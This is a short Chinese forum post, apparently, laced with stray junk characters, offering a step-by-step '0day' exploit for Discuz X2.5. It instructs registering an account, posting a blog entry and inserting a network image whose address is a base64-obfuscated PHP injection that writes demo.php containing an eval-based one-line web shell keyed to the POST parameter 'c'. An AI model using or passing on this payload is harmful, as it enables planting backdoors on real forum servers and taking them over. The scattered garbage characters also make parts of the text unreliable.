DZ X2.5最新0day. ^5 u: H" `, [) z/ [9 K
1.注册任意账户
. `7 @6 \/ Q" f# ^/ E( Z4 A: R2.登陆用户,发表blog日志(注意是日志) //点击一下中间注册的用户名 就看到了7 _) `) V2 t$ O' X" @9 {1 w9 I* e
3.添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}} //所使用代码4 [7 V6 Q$ c, j8 w
<?php @eval($_POST[c]); ?>ok& u1 b2 L9 U+ ?+ H8 l3 E8 c/ y
<?fputs(fopen("dome","w"),"<?eval(\$_POST[c]);?>")?>
' t; ], K/ h) f% E, w4.访问日志,论坛根目录下生成demo.php,一句发密码C |